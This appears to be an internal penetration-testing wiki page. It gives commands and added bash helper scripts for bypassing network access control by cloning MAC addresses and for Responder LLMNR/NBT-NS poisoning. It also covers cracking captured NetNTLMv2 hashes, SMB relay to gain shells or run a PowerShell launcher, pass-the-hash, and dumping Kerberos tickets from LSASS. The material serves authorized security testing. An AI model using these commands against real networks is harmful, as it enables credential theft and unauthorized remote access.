Internal Penetration Testing Guide

Hack Ticks Wiki

Additional Tools
The following tools are not installed by default in the prerequisite toolset, but provide significant value in certain scenarios during testing:

Logging Configuration

Windows (PowerShell):
The profile script below runs every time a Windows PowerShell prompt is opened. It keeps a persistent record of the session's command history by writing Get-History to disk when the session exits, once without timestamps and once with them (Format-List shows StartExecutionTime and EndExecutionTime for every entry). Two caveats: the PowerShell.Exiting event only fires on a clean exit (the exit command), so nothing is written if the console window is simply closed or killed; and the execution policy must allow the profile to load (e.g. RemoteSigned for the current user), otherwise it is skipped silently.

  1. Create the following file (this is the per-user profile for Windows PowerShell 5.1; PowerShell 7 reads Documents\PowerShell\Microsoft.PowerShell_profile.ps1 instead):
C:\Users\[USERNAME]\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2. Save the following PowerShell code to this file:
# Set file/folder to save history
$LogDir = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs"
$HistoryFilePath = "$LogDir\ps_history-$(Get-Date -Format MM-dd-yyyy).txt"
$HistoryFilePathTimeStamped = "$LogDir\Timestamped\ps_history-TIMESTAMPED-$(Get-Date -Format MM-dd-yyyy).txt"

# Create the log folders on first use (Out-File fails if the directory does not exist)
New-Item -ItemType Directory -Force -Path "$LogDir\Timestamped" | Out-Null

# Output history destination file/folder to stdout
Write-Host "History will be written to the following files upon exiting: "
Write-Host "$HistoryFilePath" -ForegroundColor "green"
Write-Host "$HistoryFilePathTimeStamped" -ForegroundColor "green"

# Upon exit, dump history to file (one date stamp per session, then the command lines)
Register-EngineEvent PowerShell.Exiting -Action {
    Get-Date -Format g | Out-File -FilePath $HistoryFilePath -Append
    Get-History | Out-File -FilePath $HistoryFilePath -Append
} | Out-Null

# Upon exit, dump history with per-command start/end timestamps to file
Register-EngineEvent PowerShell.Exiting -Action {
    Get-History | Format-List | Out-File -FilePath $HistoryFilePathTimeStamped -Append
} | Out-Null

# Adds ability to search history using up/down keys (requires the PSReadLine module)
Set-PSReadlineKeyHandler -Key UpArrow -Function HistorySearchBackward
Set-PSReadlineKeyHandler -Key DownArrow -Function HistorySearchForward

Metasploit:
The resource file below runs automatically whenever msfconsole is launched. It keeps a log of both input and output: ConsoleLogging and the spool file cover the standard MSF commands/modules, and SessionLogging additionally records interactive sessions (e.g., a Meterpreter shell) under ~/.msf4/logs/. TimestampOutput prefixes console output with a timestamp and LogLevel 3 is the most verbose level.

  1. Create the following file with these contents (the head output shows the first 8 lines of the file):
>>> head -n 8 /root/.msf4/msfconsole.rc
#[framework/core]
setg SessionLogging true
setg TimestampOutput true
setg ConsoleLogging true
setg LogLevel 3
setg PROMPT [%yel%T%whi] { %grnS:%S J:%J%whi} %whi%W
spool /root/.msf4/logs/spool.log
#[framework/ui/console]

Network Access Control (NAC) Testing

Plug into a network port and check whether you receive an address from DHCP. If no lease is offered (or the lease lands you in an isolated quarantine VLAN with nothing reachable), a NAC solution is probably in place: either MAC-based port filtering or 802.1X.

MAC Filtering Bypass

Get the MAC address of a device that is already permitted on the port, typically a VoIP phone or printer: read it from the device's label or sniff it passively from the LLDP/CDP/ARP frames it sends. Set it on your interface (the interface has to be down while macchanger changes the address) and request a DHCP lease again. Unplug the legitimate device first, or connect through it, so the switch does not see the same MAC on two ports. This defeats MAC whitelists and MAC Authentication Bypass (MAB) fallback; a port that insists on a full 802.1X/EAP exchange needs the inline device approach described further down.

Set MAC Address:

macchanger --mac=XX:XX:XX:XX:XX:XX eth0
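Added example (editor-supplied code, not part of the wiki or of the dhclient/tcpdump/macchanger projects): a small bash workflow that scripts the two checks above, a one-shot DHCP probe as the NAC indicator and a passive harvest of source MACs from a capture, preferring LLDP/CDP senders because that is where VoIP phones show up, which then feeds macchanger. It assumes a Linux attack box with dhclient, tcpdump, iproute2 and macchanger installed; the interface name eth0 and the sample capture lines are constructed assumptions, not real data.

```shell
#!/usr/bin/env bash
# Added example, not taken from the wiki: NAC presence check and MAC-clone helpers.
# Assumes a Linux attack box with dhclient, tcpdump, iproute2 and macchanger installed;
# the interface name (eth0) is an assumption, override with IFACE=...
set -u
IFACE="${IFACE:-eth0}"

# 1. NAC check: one DHCP attempt. dhclient -1 exits non-zero when no lease is offered,
#    which is the "no address from DHCP" symptom described above.
got_dhcp_lease() {
    local iface="$1"
    dhclient -1 -v "$iface" >/dev/null 2>&1
}

# 2. Harvest source MACs from a passive capture. Feed this the text output of
#    "tcpdump -e -nn" (every frame line reads "<time> <src-mac> > <dst-mac>, ...");
#    it prints each unique source MAC once. Plain awk without interval regexes,
#    so it works with mawk as well as gawk.
extract_source_macs() {
    awk '$3 == ">" && length($2) == 17 && $2 ~ /^[0-9a-f:]+$/ { print $2 }' | sort -u
}

# VoIP phones (and switches) announce themselves over LLDP/CDP, and a phone's MAC is
# usually already allowed on the port, so prefer the senders of those frames.
extract_lldp_cdp_senders() {
    grep -E 'LLDP|CDP' | extract_source_macs
}

# Listen without sending anything (-p: no promiscuous mode, -l: line buffered output).
capture_source_macs() {
    local iface="$1" seconds="${2:-60}"
    timeout "$seconds" tcpdump -p -l -e -nn -i "$iface" 2>/dev/null | extract_source_macs
}

# 3. Clone a harvested MAC and retry DHCP. The link must be down for macchanger to
#    change the address, and the real device should be unplugged (or you sit on a
#    passthrough) so the switch does not see the same MAC on two ports.
clone_mac() {
    local iface="$1" mac="$2"
    ip link set "$iface" down
    macchanger --mac="$mac" "$iface"
    ip link set "$iface" up
    got_dhcp_lease "$iface"
}

# Constructed sample of tcpdump -e -nn output (not a real capture) for a dry run.
SAMPLE_CAPTURE='12:00:01.000001 00:0b:82:aa:bb:cc > 01:80:c2:00:00:0e, ethertype LLDP (0x88cc), length 180: LLDP, length 166
12:00:02.000002 00:0b:82:aa:bb:cc > 01:00:0c:cc:cc:cc SNAP Oui Cisco (0x00000c) pid CDP (0x2000): CDPv2, ttl: 180s, checksum: 0 (unverified), length 120
12:00:03.000003 3c:52:82:11:22:33 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.0.1 tell 10.0.0.45, length 46
12:00:04.000004 00:0b:82:aa:bb:cc > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.0.1 tell 10.0.0.12, length 46'

# Dry run on the constructed sample. On a live test replace it with:
#   capture_source_macs "$IFACE" 120 | tee macs.txt
#   clone_mac "$IFACE" <mac from macs.txt>
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_CAPTURE" | extract_lldp_cdp_senders
fi
```

Run it with --demo to see the phone MAC picked out of the sample; on the wire, run capture_source_macs for a couple of minutes first, since phones only send LLDP/CDP every 30 s or so.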

IPv6 Traffic Exclusion

Utilize nmap's "-6" option and/or Metasploit's "ipv6_multicast_ping" and "ipv6_neighbor" modules for IPv6 host discovery, as some NAC solutions strictly focus on IPv4 traffic. Link-local (fe80::) addresses only make sense together with an interface, so tell nmap which one to use with "-e [interface]" when scanning them.

List IPV6 addresses with Metasploit:

sudo msfconsole -q
msf > use auxiliary/scanner/discovery/ipv6_multicast_ping
msf auxiliary(ipv6_multicast_ping) > set RHOSTS fe80::4dc4:bd17:56a1:a472/64
msf auxiliary(ipv6_multicast_ping) > run
[*] Running module against fe80::
[*] Sending multicast pings...
[*] Listening for responses...
[*]    |*| fe80::103a:5e16:5a41:6687 => 36:d0:0d:4b:26:64

Scan IPv6 addresses with Nmap:

nmap -6 -sV fe80::103a:5e16:5a41:6687

Dedicated NAC Bypass Device (Intrusive)

A dedicated physical device (e.g., a Pwn Plug) can be placed inline between an already-authorised endpoint and the switch and configured to bypass the implemented NAC mechanism, including 802.1X, by piggybacking on that endpoint's authenticated session. This requires physical access to the target machine's network drop and leaves hardware on site, hence intrusive.

Passive Reconnaissance / Information Gathering

Responder

Use the maintained fork of Responder (lgandx/Responder) rather than the original SpiderLabs repository.

Captured hashes are stored in /usr/share/responder/logs/[PROTOCOL]-[HASHTYPE]-[IPADDRESS].txt (one file per protocol, hash type and client; every poisoned request appends a new line, so expect duplicates per user).

Check for LLMNR/NBT-NS requests (analyze mode, -A: reports the name requests it sees without answering them, so nothing is poisoned yet):

responder -A -I [interface]

Actively poison LLMNR/NBT-NS requests (answer the name lookups and capture the resulting authentication attempts):

responder -I [interface]
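Added example, not from the wiki or the Responder project: a bash helper that reads the NTLMv2 files Responder writes to the logs directory named above, keeps one capture per account, and hands the result to hashcat. The log path, file name patterns and the sample hash lines are assumptions and constructed data, not captures from a real engagement.

```shell
#!/usr/bin/env bash
# Added example, not part of the wiki: turn Responder's NTLMv2 log files into a
# hashcat input with one entry per account. Responder writes a new challenge/response
# line for every poisoned request, so the per-client files fill with duplicates for the
# same user and cracking all of them wastes GPU time.
# The log directory is the Kali default; override with RESPONDER_LOGS=...
set -u
RESPONDER_LOGS="${RESPONDER_LOGS:-/usr/share/responder/logs}"

# NetNTLMv2 lines are  user::DOMAIN:serverchallenge:ntproofstr:blob  (6 colon-separated
# fields, the second one empty). Keep the first line seen for each DOMAIN/user, matched
# case-insensitively because Windows account names are not case-sensitive.
dedupe_netntlmv2() {
    awk -F: 'NF == 6 && $2 == "" {
        key = tolower($3 "/" $1)
        if (!(key in seen)) { seen[key] = 1; print }
    }'
}

# Gather every *NTLMv2* capture file (SMB-NTLMv2-SSP-<ip>.txt, HTTP-NTLMv2-<ip>.txt, ...)
# and write the deduplicated list for hashcat mode 5600 (NetNTLMv2). Prints the count.
# NTLMv1 captures land in *NTLMv1* files and need mode 5500 instead.
build_hashcat_input() {
    local outfile="${1:-netntlmv2.txt}"
    cat "$RESPONDER_LOGS"/*NTLMv2*.txt 2>/dev/null | dedupe_netntlmv2 > "$outfile"
    wc -l < "$outfile"
}

crack_netntlmv2() {
    local hashfile="$1" wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
    hashcat -m 5600 -a 0 "$hashfile" "$wordlist"
}

# Constructed sample (fake hex, not from a real capture): jsmith captured twice with
# different server challenges, once more as JSMITH, plus one other account.
SAMPLE_CAPTURES='jsmith::CORP:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000a0b1c2d3e4f5a6b7
JSMITH::CORP:8877665544332211:fedcba9876543210fedcba9876543210:0101000000000000b7a6f5e4d3c2b1a0
svc_backup::CORP:0102030405060708:00112233445566778899aabbccddeeff:01010000000000001122334455667788
jsmith::CORP:aabbccddeeff0011:ffeeddccbbaa99887766554433221100:0101000000000000ffffffffffffffff'

# Dry run on the sample; live use: build_hashcat_input hashes.txt && crack_netntlmv2 hashes.txt
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_CAPTURES" | dedupe_netntlmv2
fi
```

The demo prints two lines (jsmith's first capture and svc_backup); the three other jsmith entries would have cost three extra cracking runs for the same password.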

Credential Theft/Reuse

SMB/NetNTLM Relay

Captured NetNTLM authentication can be relayed to another host over SMB only if that destination host does not require SMB message signing; the signing setting that matters is the relay target's, not the victim's. By default, non-server Windows (workstations) and member servers do not require SMB signing, whereas domain controllers do, so workstations are the usual relay targets. (Windows 11 24H2 and Server 2025 changed this default and require signing out of the box.)

Since MS08-068 it is no longer possible to reflect the authentication back to the machine it came from over the same protocol; relaying to a different host (or across protocols) still works.

Testing for SMB Message Signing with Nmap (look for "message_signing: disabled" or "supported" in the output; "required" means the host is not a relay target):

nmap -sS -Pn -n -p 139,445 --script smb-security-mode [TARGETSUBNET]

Testing for SMB Message Signing with Responder's RunFinger.py:

python /usr/share/responder-multirelay/tools/RunFinger.py -g -i [TARGETSUBNET]

Testing for SMB Message Signing with CrackMapExec (writes only the hosts where signing is not required, i.e. a ready-made target file for ntlmrelayx; the same option exists in its successor NetExec, nxc):

cme smb [TARGETSUBNET] --gen-relay-list [OUTPUTFILE]

Other service testing with responder:
When relaying, turn off the Responder servers for the protocols the relay tool (MultiRelay/ntlmrelayx) listens on, SMB and HTTP, so that the relay tool rather than Responder receives the connection; Responder keeps poisoning LLMNR/NBT-NS and serving the remaining protocols.

root@kali:/etc/responder# head -15 Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

Responder with Redirections (-r also answers NetBIOS wredir suffix queries, which can break things on the network; -v is verbose):

responder -I [INTERFACE] -rv

Using Responder to get shells:
Running the MultiRelay command below results in a shell on the target if a relayed authentication request succeeds. The -u parameter selects which user(s) to relay; "ALL" relays every user.

# Relay any user
python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u ALL
# Single User Relay
python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u Admin

Impacket ntlmrelayx with a PowerShell command:
-tf takes the target list (e.g. the CrackMapExec relay list above) and -c is executed on each target after a successful relay. If no command is provided the SAM database is dumped by default.

python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf [TARGETSFILE] -c [EMPIRE POWERSHELL LAUNCHER COMMAND]

The resulting MultiRelay shell offers extended functionality, detailed in Laurent Gaffie's blog post, including remote Mimikatz commands.
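Added example covering both the signing checks and the relay setup above (editor-supplied, not from the wiki, nmap, Responder or impacket): it turns nmap smb-security-mode output into a relay target list, rewrites Responder.conf so the SMB and HTTP servers are off, and launches ntlmrelayx against that list. Assumed: ntlmrelayx.py on PATH (Kali also ships it as impacket-ntlmrelayx) and Responder.conf at /etc/responder/Responder.conf; the nmap output and the config snippet are constructed samples.

```shell
#!/usr/bin/env bash
# Added example, not part of the wiki: build the relay target list from an nmap
# smb-security-mode scan, switch off the Responder servers that would otherwise
# grab the SMB/HTTP connections, and start ntlmrelayx against that list.
# Assumptions: ntlmrelayx.py is on PATH; Responder.conf is at /etc/responder/Responder.conf.
set -u

# nmap prints "Nmap scan report for <host>" and, per host, one of
# "|_  message_signing: disabled (dangerous, but default)" / "supported" / "required".
# Only hosts that do NOT require signing are usable relay targets.
relay_targets_from_nmap() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }   # "(10.0.0.5)" -> 10.0.0.5
        /message_signing:/ && $0 !~ /required/ { print host }
    '
}

# Responder must not answer on the protocols the relay tool listens on: flip exactly the
# "SMB = On" and "HTTP = On" lines under [Responder Core] (HTTPS is left alone).
responder_conf_for_relay() {
    sed -E 's/^(SMB|HTTP) = On/\1 = Off/'
}

run_relay() {
    local targets="$1" cmd="${2:-}"
    # -smb2support is needed for targets that only speak SMB2/3; without -c the SAM
    # database of each target is dumped, which is ntlmrelayx's default action.
    if [ -n "$cmd" ]; then
        ntlmrelayx.py -tf "$targets" -smb2support -c "$cmd"
    else
        ntlmrelayx.py -tf "$targets" -smb2support
    fi
}

# Constructed nmap output (not a real scan): two hosts with signing not required and
# one domain controller that requires it.
SAMPLE_NMAP='Nmap scan report for 10.0.0.10
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc01.corp.local (10.0.0.5)
Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 10.0.0.20
Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported'

# Constructed excerpt of Responder.conf before editing.
SAMPLE_CONF='[Responder Core]
; Servers to start
SQL = On
SMB = On
HTTP = On
HTTPS = On'

# Dry run on the samples. Live use:
#   nmap -sS -Pn -n -p 139,445 --script smb-security-mode -oN smb.txt [TARGETSUBNET]
#   relay_targets_from_nmap < smb.txt > relay_targets.txt
#   responder_conf_for_relay < /etc/responder/Responder.conf > /tmp/Responder.conf  (then install it)
#   responder -I eth0        # terminal 1, poisoning only
#   run_relay relay_targets.txt "powershell -enc ..."   # terminal 2
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_NMAP" | relay_targets_from_nmap
    printf '%s\n' "$SAMPLE_CONF" | responder_conf_for_relay
fi
```

The demo lists 10.0.0.10 and 10.0.0.20 as targets and drops the DC, then prints the config with SMB and HTTP set to Off and HTTPS untouched.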

Pass-the-Hash (PTH)

This technique requires a previously compromised NTLM (NT) or LM hash of an account's password, i.e. the stored credential as dumped from the SAM, LSASS or NTDS.dit. It cannot be done with the NetNTLMv1/NetNTLMv2 challenge-response hashes that Responder and similar tools capture: those are proofs computed over a one-time server challenge, not the reusable secret, and can only be cracked or relayed.

  1. Compromise an NTLM/LM hash
  2. Determine which machines the corresponding account (for the hash) has access to. This can be done in several ways:
    1. Leverage Active Directory reconnaissance techniques to enumerate a list of logged-on users for all target machines. This is best accomplished using PowerView, which is one of the Recon modules of PowerSploit.

Mimikatz

pypykatz

Mimikatz implementation in pure Python. It parses LSASS minidumps offline, so the dump can be taken on the target and analysed on the attack box.

Dumping Kerberos tickets from a dump file (the .kirbi/.ccache files are written to the directory given with -k):

>>> pypykatz lsa -k /root/data/kerberos minidump lsass.dmp
INFO:root:Parcing file lsass.dmp
FILE: ========= lsass.dmp =======
[...]
>>> ls /root/data/kerberos
lsass.dmp_768ec70d.ccache
TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.kirbi
[...]

Viewing Kerberos tickets (convert the .kirbi to a ccache, point KRB5CCNAME at it and list it with klist, which comes from the krb5-user package):

>>> kirbi2ccache TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.{kirbi,ccache}
>>> export KRB5CCNAME=/path/to/.ccache
>>> klist
Ticket cache: FILE:/root/data/kerberos/Admin.ccache
Default principal: [email protected]

Valid Starting       Expires              Service Principal
11/21/2019 20:39:01  11/22/2019 06:39:01  krbtgt/WINLAB.COM@WINLAB.COM
        renew until 11/28/2019 20:39:01

Using Kerberos tickets (-k -no-pass makes impacket use the ccache in KRB5CCNAME; domain/user must match the ticket's principal and the target has to be given by its FQDN rather than an IP, otherwise no matching service ticket is found):

>>> wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Mimipenguin

A tool that dumps cleartext login passwords from process memory on a Linux host; it needs root.

Active Directory Reconnaissance

Use Domain Account Without Domain-Joined Computer

Using a compromised domain user account, you can leverage the following technique to execute commands that interact with the target domain without using a domain-joined machine. Instead, you run commands directly on your Windows testing machine/VM: runas with the /netonly switch starts a program under your local identity but presents the supplied domain credentials whenever that program authenticates to the network.

  1. Launch a command prompt (cmd.exe)
  2. Run the program through runas /netonly, giving the domain account as DOMAIN\username. Note that the "PROGRAM" argument can be any program on your machine/VM, including cmd.exe, powershell.exe, mimikatz, etc. In this example, we'll launch cmd.exe and subsequently PowerShell (bypassing the execution policy using "-exec bypass").
  3. Enter the account password when prompted. It is not validated locally, so a wrong password only shows up later as failed network authentication.
  4. From the new cmd.exe window, start PowerShell with "-exec bypass" and run your domain reconnaissance commands (e.g. PowerView) from there.
  5. To confirm that the domain credentials are in use, access a domain resource such as a share on a domain controller. Note that whoami will still report your local account, because /netonly only applies the credentials to outbound network authentication.